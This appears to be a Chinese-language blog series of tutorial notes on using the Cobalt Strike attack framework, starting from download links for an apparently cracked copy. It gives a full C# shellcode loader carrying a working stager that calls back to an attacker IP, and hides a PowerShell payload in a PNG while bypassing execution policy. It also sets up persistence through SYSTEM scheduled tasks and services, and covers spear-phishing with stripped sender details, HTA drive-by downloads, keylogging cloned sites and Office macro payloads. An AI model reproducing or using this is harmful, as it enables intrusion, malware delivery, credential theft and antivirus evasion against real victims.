下载链接:

链接:https://pan.baidu.com/s/130JV1z9-xz6shmFBcM8Erw
提取码:2kqb
复制这段内容后打开百度网盘手机App,操作更方便哦

先把之前的卸掉

一直回车到下图

安装成功

检查是否成功:

登录系统后, 点击右上角的”Administrator->Profile->License”,可以看到99999就说明成功激活

修改不检查更新:

登录系统后,左下角Settings->ProductUpgrades,改为”Do not automaticaly check for update[Not Recommanded]”(注意保存Save)

注:装好后,ubuntu重启一下.

安装依赖库

sudo apt-get install libxdamage1 libgtk-3-0 libasound2 libnss3 libxss1 libx11-xcb-dev

前提监听,和制作C#免杀的方式类似,这次选择powershell

Ps代码嵌入图片

将生成的ps代码集成到一个图片中,图片尽量像素大一点,我们需要用到invoke-psimage脚本,原理是将脚本中的字节数据存储到图片中,而图片的每一个像素都会存一个字节,所以图片像素尽量大一点。

这里用到一个脚本

Invoke-psimage Imvoke-psimage会将:个powershell脚本以字节方式嵌入到png图片的像素中,并生成一行执行命令来帮助我们从文件或web执行它们。

它会利用图片中每个像素点最后4位有效位的2个颜色值来存储payload数据,图片质量会稍微有些影响,但基本看不出来什么区别。图片需要为png格式,因为payload数据存储在颜色值中,所以这种格式可以进行无损压缩且不会影响payload执行。它可以接受大多数图片类型作为输入,但输出必须为png格式,因为输出图像数据需要是无损的。

https://github.com/peewpw/Invoke-PSlmage

Invoke-psimage操作

Powershell -ExecutionPolicy Bypass
Import-Module .\Invoke-PSImage.ps1

Invoke-PSImage -Script .\payload.ps1 -Image .\test.jpg -Out test2.png -Web因为我们需要使用import-module来加载invoke-psimage脚本,而powershell默认是不允许加载外部脚本文件的,所以在打开powershell时需要用executionpolicy bypass参数来绕过策略的限制。

其中test.jpg是网上找的可以拼进去的图片,尽量大些,test2.png后缀必须是png才可以

将红框复制出来,然后把test2.png上传到服务端

将这部分复制出来,将下图选中部分替换

然后将这一段发给win7,运行powshell执行(同时开启360杀毒)获得shell,过程中没有报毒,之后学习配合msf可以更加隐蔽

这里得到的也只是管理员权限

本篇主要学习这种方法,现在测试已经不能够过360的杀毒了,更不要提火绒了

前提监听,选择如图所示的payload

64位电脑勾选

这里会生成一个cs文件里面使一行payload,接下来我们要套模板将其替换

模板如下:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;

namespace ShellCodeLauncher
{
class Program
{
static void Main()
{
//要修改这里
byte[] shellcode = new byte[894] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 0x48, 0x8b, 0x52, 0x60, 0x48, 0x8b, 0x52, 0x18, 0x48, 0x8b, 0x52, 0x20, 0x48, 0x8b, 0x72, 0x50, 0x48, 0x0f, 0xb7, 0x4a, 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 0x41, 0x51, 0x48, 0x8b, 0x52, 0x20, 0x8b, 0x42, 0x3c, 0x48, 0x01, 0xd0, 0x66, 0x81, 0x78, 0x18, 0x0b, 0x02, 0x75, 0x72, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x67, 0x48, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x44, 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x56, 0x48, 0xff, 0xc9, 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 0xf1, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd8, 0x58, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x41, 0x8b, 0x0c, 0x48, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x48, 0x8b, 0x12, 0xe9, 0x4f, 0xff, 0xff, 0xff, 0x5d, 0x6a, 0x00, 0x49, 0xbe, 0x77, 0x69, 0x6e, 0x69, 0x6e, 0x65, 0x74, 0x00, 0x41, 0x56, 0x49, 0x89, 0xe6, 0x4c, 0x89, 0xf1, 0x41, 0xba, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x48, 0x31, 0xd2, 0x4d, 0x31, 0xc0, 0x4d, 0x31, 0xc9, 0x41, 0x50, 0x41, 0x50, 0x41, 0xba, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xeb, 0x73, 0x5a, 0x48, 0x89, 0xc1, 0x41, 0xb8, 0x27, 0x23, 0x00, 0x00, 0x4d, 0x31, 0xc9, 0x41, 0x51, 0x41, 0x51, 0x6a, 0x03, 0x41, 0x51, 0x41, 0xba, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x59, 0x5b, 0x48, 0x89, 0xc1, 0x48, 0x31, 0xd2, 0x49, 0x89, 0xd8, 0x4d, 0x31, 0xc9, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x41, 0xba, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x48, 0x89, 0xc6, 0x48, 0x83, 0xc3, 0x50, 0x6a, 0x0a, 0x5f, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x49, 0xc7, 0xc0, 0xff, 0xff, 0xff, 0xff, 0x4d, 0x31, 0xc9, 0x52, 0x52, 0x41, 0xba, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x85, 0x9d, 0x01, 0x00, 0x00, 0x48, 0xff, 0xcf, 0x0f, 0x84, 0x8c, 0x01, 0x00, 0x00, 0xeb, 0xd3, 0xe9, 0xe4, 0x01, 0x00, 0x00, 0xe8, 0xa2, 0xff, 0xff, 0xff, 0x2f, 0x57, 0x6c, 0x4d, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x34, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x38, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x31, 0x3b, 0x20, 0x57, 0x4f, 0x57, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x34, 0x2e, 0x30, 0x3b, 0x20, 0x53, 0x4c, 0x43, 0x43, 0x32, 0x3b, 0x20, 0x2e, 0x4e, 0x45, 0x54, 0x20, 0x43, 0x4c, 0x52, 0x20, 0x32, 0x2e, 0x30, 0x2e, 0x35, 0x30, 0x37, 0x32, 0x37, 0x29, 0x0d, 0x0a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0xbe, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0xba, 0x00, 0x00, 0x40, 0x00, 0x41, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x41, 0xb9, 0x40, 0x00, 0x00, 0x00, 0x41, 0xba, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x48, 0x93, 0x53, 0x53, 0x48, 0x89, 0xe7, 0x48, 0x89, 0xf1, 0x48, 0x89, 0xda, 0x41, 0xb8, 0x00, 0x20, 0x00, 0x00, 0x49, 0x89, 0xf9, 0x41, 0xba, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x20, 0x85, 0xc0, 0x74, 0xb6, 0x66, 0x8b, 0x07, 0x48, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xd7, 0x58, 0x58, 0x58, 0x48, 0x05, 0x00, 0x00, 0x00, 0x00, 0x50, 0xc3, 0xe8, 0x9f, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x39, 0x34, 0x2e, 0x31, 0x38, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };//修改结束
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
// prepare data
IntPtr pinfo = IntPtr.Zero;
// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport(“kernel32”)]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport(“kernel32”)]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport(“kernel32”)]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
}
}

将刚刚生成的两行替换到上面模板注释的部分,然后用.NET进行编译生成exe文件,这里就需要.NET的环境,正常都有,没有自行下载即可,然后进入其目录编译

介绍一下CSC的使用

out:是指定生成后exe的文件名称,/unsafe是使用非安全模式来编译代码,非安全模式下编译的代码允许其操作内存地址以及这些地址上的直接,会引起不安全代码的执行,有安全风险,所以是定为不安全模式。

执行完毕会在当前文件夹下生成shellcode.exe文件,我们将它放到win7靶机上,这里我用360测试杀毒,被杀掉。over

然后我们学习一下一种新玩法,如果没有被杀掉的话

windows计划任务

schtasks(schdule task:计划任务)

schtasks /create /RL HIGHEST /F /RU “SYSTEM” /TN “WindowsS” /TR “C:/shellcode.exe” /SC DAILY /MO 1 /ST 00:00

/RL:设置任务的运行级别。有效值为LIMITED和HIGHEST。默认为LUMITED。

/F:如果指定的任务已存在,则强制创建任务并禁止警告的值。

/RU:指定运行任务的用户上下文。

/TN:指定唯一标识计划任务的名称。

/TR:指定要在计划的时间运行的任务的路径和文件名。

/SC:指定计划频率,DAILY为每天。

/MO:对于MINUTE,HOURLY,DAlILYWEEKLY有效,可选参数,默认为1.

/sT:指定运行任务的开始时间,格式为H出:mm(24小时制)。

查看计划任务 schtasks /query | findstr “WindowsS”

这里我在win7查看状态的时候不给我回显,没关系我们可以自己用图形化看

win键输入计算机管理->计划任务

运行计划任务 schtasks /run /TN “WindowsS”

删除计划任务 schtasks /delete /F /TN “WindowsS”

然后我们运行计划任务之后可以收到shell,且是system权限,因为我们是以system权限运行的

前提:运用到前几篇所学,克隆网站,office宏的应用

当我们搜集到内网的一些邮箱时,可以使用批量发送钓鱼邮件来进行攻击获得shell

首先监听端口,制作克隆站点,这里依然以https://www.baidu.com为例

然后制作office宏病毒,我们将其压缩成一个包office,zip密码123456,是为了绕过对其的一些检测

接着我们选择Attacks->spear Phish构造钓鱼

Targets中是要发送的邮件,这里因为我邮件有限,以自己的小号为例

Template是发送内容的模板

Attachment是要发送所带的附件

Embed URL是钓鱼链接,我们在克隆网站那步生成的网址,这里我没有填是因为我在发送的邮件内容中包含了钓鱼链接

Mail Server如图填写,账号:授权码@smtp.qq.com

Bounce To:与上一栏邮箱对应即可

发送内容模板获取:

首先将钓鱼的内容写好给自己的小号发一份,然后再已发送中找到刚刚的邮件,如图点击,显示邮件原文,然后将其内容导出到一个txt文本中,我这里命名content.txt

这里将红色区域删掉,这样就不知道是谁发送的

这样模板就这做好了

还有一个问题是获取QQ的授权码

然后发送个短信验证一下就获得授权码了

然后再刚刚的 Mail Server 右边点击填写,Username处就是要发送钓鱼链接的邮箱,Password是刚刚获取的授权码

之后我们发送邮件即可

然后那边收到邮箱,将下载的附件打开,获得shell

实际渗透过程中,首先再次注意克隆的网站要选好,有的情况需要自己去写,因为克隆的效果可能不是很好,邮件的内容也要因地制宜,注意实际情况

介绍前提:hta文件其实也是一种类似exe的可执行文件,里面的内容是html代码

设置监听就不重复了

攻击操作,生成hta文件
这里选择Powershell相当于一种超级CMD,去执行

生成完文件后我们将hta文件上传到CS的服务端去

使用cs自带的服务器Host File,我们把刚刚的hta文件上传上去

注意:这里选择的hta木马文件不用向服务器传,在使用host file时cs会自动把这个文件放到服务器,在CS目录下的uploads文件夹中

这样就挂到CS自己的服务器上了,回到我们的kali服务器上可以看到在uploads文件夹下

然后我们回到客户端查看钓鱼连接情况Attacks->Web Drive-by->Manage

这里注意:如果我们之前有过钓鱼链接要及时删除,不然会在克隆的时候起冲突

要克隆的站点可以是其他的,我这里以百度为例,Local Host依然是可以是公网服务器,Attack选择刚刚的钓鱼链接(也可以放搜集信息的连接,即之前介绍的system profile,或者是下载木马的连接host file,然后我们克隆的钓鱼页面中所有的超链接点击时都会触发我们的attack),最后勾选项选中可以获得受害者在浏览钓鱼网站上输入到键盘上的信息

这里我依然尝试了给win10物理机不好使,win7虚拟机和本机虚拟机都好使

Win7上输入信息可以看到输入的内容被抓到

这里应该截在百度的输入,在这个页面输入的信息是截取不到的

然后我们查看键盘钩子获取到的信息View->Web Log

当然以上的抓取信息只能抓到在克隆页面输入的信息

需求

在生成Payload之前,我们可以先获取以下目标的基本信息,来进行针对性的Payload生成

生成钓鱼网站使用Web Drive-by模块的System Profiler

第一个一般都写根目录

第一个红框的在实际应用中一般都是公网服务器的ip(可以阿里云上租学生云,挺便宜),这里为了实验依然写的是kali服务器的ip

第二个红框是用户点击完钓鱼网站后,重定向到哪里

最下面的勾选项,如果不勾选CS是以默认的JS脚本去获取,如果我们勾选的话,是使用java程序去获取应用信息

区别是JAVA程序可能相对于CS获取的准确性更高些

然后我们可以在Web Drive-by的Manage看到刚刚生成的钓鱼网站的信息,类似于监听

然后我们复制这个连接,访问,可以发现有一会就重定向到baidu了 ,并将部分信息返回到Cobalt Strike上

我们可以如图选择查看钓鱼连接给我们返回的信息(View->Applications),这里因为我多点了几次,返回的有重复

红色获取的是对方外网的ip,蓝色获取的是对方内网的ip,因为这里实验都是局域网所以就都是一样的

最后附加

钓鱼链接的优化

使用短地址,提高攻击的可能性,下面提供一个网站

https://bitly.com

至此一个简单的钓鱼设置完毕,这里只获取了目标打开钓鱼网站的浏览器及其版本信息,操作系统的版本和打开时间。更复杂的玩法我可能在后续的学习过程中探索

设置监听,制作payload,不重复了,今天这种方式不能直接双击运行,需要以启动服务的方式获得shell

Windows Service EXE是以服务的方式启动Payload

如上图选择生成exe,为了实验将该exe发给win7

服务的创建、启动、停止和删除

sc create 服务名(artifact) binpath= ”C:\test.exe” start= auto displayname= ”test service”

binpath的路径是生成的exe在目标机上所存放的路径

start启动设置为自动,displayname显示的名称是在计算机任务管理器中服务栏中显示的该exe的服务名称

sc start artifact

sc delete artifact

sc stop artifact

目标机上管理员启动cmd

Win键然后输入service.exe,或者右键计算机->属性->服务,找到我们刚刚生成的test service服务,启动它 sc start test

这里只是看到有此服务生成,无法以图形化界面启动它,需要刚刚的命令

执行完启动命令,就可以看到Cobalt Strike上获得shell

缺点:是只能以服务的方式去启动,不能直接双击运行

优点:服务情动和普通EXE区别

  1. 服务启动如果目标是以管理员创建的服务,则返回的权限会直接是system权限,而普通的exe返回的会是目标默认用户权限,如果这个权限是普通用户或者是管理员,则后面可能还需要提权到system
  2. https方式,其流量可以防止被目标的一些防护软件进行方向解析(这个现在有些鸡肋,360依然报毒)

设置监听
生成宏payload

然后选择对应监听的名称,生成,可以看到应用方法如下

copy将宏代码复制出来
  1. 打开word或者excel
  2. 打开View->Macros->View Macros
  3. 选择当前的宏文件
  4. 命名(任意)
  5. 点击创建
  6. 清除编辑
  7. 复制宏代码
  8. 粘贴
  9. 关闭宏编辑
  10. 保存
宏名可以随便写,宏的位置如果如图选择,则点开所有的office文件都会反弹shell
写入之前复制的宏代码,这也会被360杀掉,后续免杀学习绕过,这里依然关闭杀毒软件,保存,再次点击运行
我是拿本机win10测试点击打开,可以看到得到多个shell

这里注意正常的office会禁用宏代码的执行,我们运行包含宏代码的文件时会有提示,这时可以诱骗其点击运行,也可以通过其他办法修改其office的设置

文件->选项

这部分就需要看个人发挥了能否将其修改

然后我这里实际测试了下win10虚拟机生成的office宏恶意文件,在win10虚拟机上运行都可以得到shell,但是我将其放到我的物理机win10上没有反弹shell,放到win7虚拟机上也没有反弹shell,一个疑惑点,后续学习的过程中可能将会补充

Cobaltstrike->Preference->Fingerprints

连过哪些服务器存储的指纹管理

Team Servers里保存连接过的ip记录

生成payload的介绍

概念:
监听:即监视器,时刻监视Payload的执行结果,及时捕捉返回的shell
Payload:利用代码,即病毒或木马,在目标及执行受将shell进行返回

创建监听:
菜单栏->cobalt strike->listeners->add

Payload中带有beacon的是Cobalt Strike自带的,剩下的三个是外来的可以与msf连用

Name随便写

Host设置为服务端(kali)的ip

Port写一个服务端没有占用的

Payload生成主要在Attacks模块,Packages是主要使用的payload模块,Web Drive by是钓鱼的模块,Spear Phish是群发邮件的

Attack-Packeges
HTML Application生成恶意的HTML木马文件
MS office Macro生成office宏病毒文件
Payload Generator生成各种语言版本的payload
USB/CD AutoPlay生成利用自动播放运行的木马文件
Windows Dropper捆绑器,能够对文档类进行捆绑
Windows Executable生成可执行exe木马
Windows Executable(S)生成无状态的可执行exe木马

Attacks-Web Drive-by:
Manage对开启的web服务进行管理
Clone Site克隆网站,可以记录受害者提交的数据
Host File剔红一个文件下载,可以修改Mime信息
PowerShell Web Deliver类似于msf的web_drlivery
Signed Applet Attack使用java自签名的程序进行钓鱼攻击
Smart Applet Attack自动检测java版本并进行攻击,针对Java 1.6.0_45以下以及Java 1.7.0_21以下版本呢
System Profiler用来获取一些系统信息,比如系统版本,Flash版本,浏览器版本等

生成一个payload exe文件执行

选泽生成的是64位的,选择监听的任务,如果有多个可以更改,点击Generate选择生成exe到一个位置(我这里到桌面),然后我们把该exe想办法发给目标机(win7),这样生成的正常是会被杀掉报毒的,之后会进行免杀学习,我们为了实验关闭杀毒软件,运行,则会在监听端口收到shell

左键选中右键点击会有对其操作的很多功能,这样我们可以后续进行后渗透,横向渗透进行操作,个人感觉比msf有些地方好一些,图形化界面方便看,以下我演示查看桌面文件

Explore->File Browser(加载会有些缓慢)

至此完成,更多玩法可以自行探索,我也可能在后续的学习中介绍

CobaltStrike的简介

Cobalt Strike是一款内网渗透测试神器,常被业界人称为CS。Cobalt Strike 2.0版 本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使 用Metasploit框架而作为一个独立的平台使用,它分为客户端与服务端,服务端是 一个,客户端可以有多个,可被团队进行分布式协团操作。客户端模式和服务端模 式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有 可能会出现一些细小的问题不过影响不大。可以很好的解决metasploit对Windows 支持不够好的问题。
Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe 木马生成,win dll木马生成,java木马生成,office宏病毒生成,木马捆绑;钓鱼攻 击包括:站点克隆,目标信息获取,java执行,浏览器自动攻击等等

CobaltStrike优点

·Payload免杀优于Msf
·图形化界面方便操作
·多人协同测试,高效合作
·集成很多内网渗透工具及命令
·可结合Msf联合使用

链接:https://pan.baidu.com/s/1n6h2w5j0TCx9GnnC5Z7gZg

提取码:1sxu 

我这里是用win10虚拟机和kali搭建的,win10虚拟机作为连接的客户端,kali作为服务端。

把linux的放到kali中,我放到opt目录下,这个一般都是存放软件的目录,然后unzip cobaltstrike-linux.zip解压

然后终端进入这个目录下,首先查看本机kali的ip地址,然后为一个文件提升下权限chmod a+x ./teamserver,因为会出现权限不够的问题,然后将服务端跑起来

./teamserver 攻击机ip地址 客户端要连接的密码

./teamserver 192.168.194.181 password

这里我把密码设为password

然后回到win10虚拟机(当然也可以放物理机,我是怕有毒之类的)运行exe文件

Host是服务端kali的ip地址,端口默认50050,User可以随便改,默认即可,Password是我们刚刚设置的password,然后链接即可

至此搭建就完成了可以使用了